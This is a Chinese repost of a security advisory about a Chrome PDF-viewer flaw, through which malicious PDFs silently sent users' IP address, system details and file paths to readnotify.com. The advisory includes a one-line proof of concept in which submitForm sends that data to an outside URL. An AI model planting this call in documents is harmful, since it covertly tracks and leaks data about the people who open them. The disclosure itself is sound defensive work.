zoukankan      html  css  js  c++  java
  • 【转载】Chrome 0day漏洞:不要用Chrome查看pdf文件

    英文原文地址:https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html

    中文原文地址:https://www.4hou.com/vulnerable/16468.html

    翻译作者:ang010ela

    发布日期:2019年3月1日发布

    版权:嘶吼(如遇版权纠纷请联系QQ:2200475850进行删除!)

    导语:​研究人员发现一起利用chrome 0day漏洞的恶意PDF样本,当用Google Chrome打开PDF 0day样本时就可以追踪用户/收集用户数据,chrome称会在4月份修复该漏洞。

    研究人员发现一起利用Chrome 0day漏洞的恶意PDF样本,当用Google Chrome打开PDF 0day样本时就可以追踪用户/收集用户数据。

    概述

    从2018年12月起,EdgeSpot研究人员检测到利用Google Chrome 0 day漏洞的多个PDF样本。攻击者利用该漏洞可以在用户用Chrome作为本地PDF阅读器时,让PDF文件的发送方来追踪用户和收集用户的部分信息。

    技术细节

    从去年12月开始,研究人员陆续发现一些恶意PDF样本。这些样本在主流的Adobe Reader中打开是没有问题的,但是当用本地Google Chrome打开后会产生一些可疑的流量。

    本文分析的样本是:

    https://www.virustotal.com/#/file/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/detection (最早提交日期为2017-10-01,文件名: “honduras-bginfo.pdf”)

    EdgeSpot的安全引擎将该恶意样本标记为POTENTIAL ZERO-DAY ATTACK (Google Chrome), PERSONAL INFORMATION LEAKAGE,如下图所示:

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    https://edgespot.io/analysis/2dd6ade4d0d4dc8224b28f8819b1c49bb7ae4025933e737ac8069c496d88bb43/

    当样本在本地Google Chrome中打开后,内容如下图所示:

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    通过在后台抓取流量,研究人员发现了一些数据在没有用户交互的情况下被发送给域名readnotify.com,也就是说这些数据在没有用户授权的情况下被窃取了。

    流量是一个HTTP POST包,如下图所示:

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    用户查看PDF文件时,该PDF实际上是在与C2服务器进行通信。

    根据HTTP包的信息,被收集和发送的用户信息包括:

    · 用户的公网IP地址

    · OS和Chrome版本等

    · PDF文件在用户电脑中的完整路径

    近期,研究人员又发现一些更多的恶意PDF样本,包括2018年11月发现的和最近@insertScript发现的。与之前样本不同的是,新样本:

    · 影响的是Google Chrome(作为本地PDF阅读器),而不是Adobe Reader。

    · 不允许窃取NTLM,但是会泄露操作系统信息和文件保存的路径。

    研究人员分析样本发现在stream-1中有可疑的JS代码。

    Chrome 0day漏洞:不要用Chrome查看pdf文件

    反混淆代码后,研究人员发现根源在于"this.submitForm()" PDF Javascript API。

    研究人员开发了一个PoC,像this.submitForm('http://google.com/test')这样的一个简单的API调用就会使Google Chrome发送个人信息到google.com。

    研究人员已经与Google取得联系,确认了0 day漏洞的详细情况,Chrome团队称该漏洞会在4月底进行更新和修复。

    研究人员建议相关用户在Chrome修复该漏洞前不要使用Chrome查看本地PDF文件,如果只能使用Chrome,那么查看的时候可疑断开网络连接。

    注:edgespot称发文后引起了一些误解,目前已经将原文中的0 day漏洞表述修改为未修复漏洞。

  • 相关阅读:
    linux下启动和关闭网卡命令及DHCP上网
    python 编码问题
    paddlepaddle
    Convolutional Neural Network Architectures for Matching Natural Language Sentences
    deep learning RNN
    Learning Structured Representation for Text Classification via Reinforcement Learning 学习笔记
    Python IO密集型任务、计算密集型任务,以及多线程、多进程
    EM 算法最好的解释
    tensorflow 调参过程
    tensorflow 学习纪录(持续更新)
  • 原文地址:https://www.cnblogs.com/anbus/p/10460841.html
Copyright © 2011-2022 走看看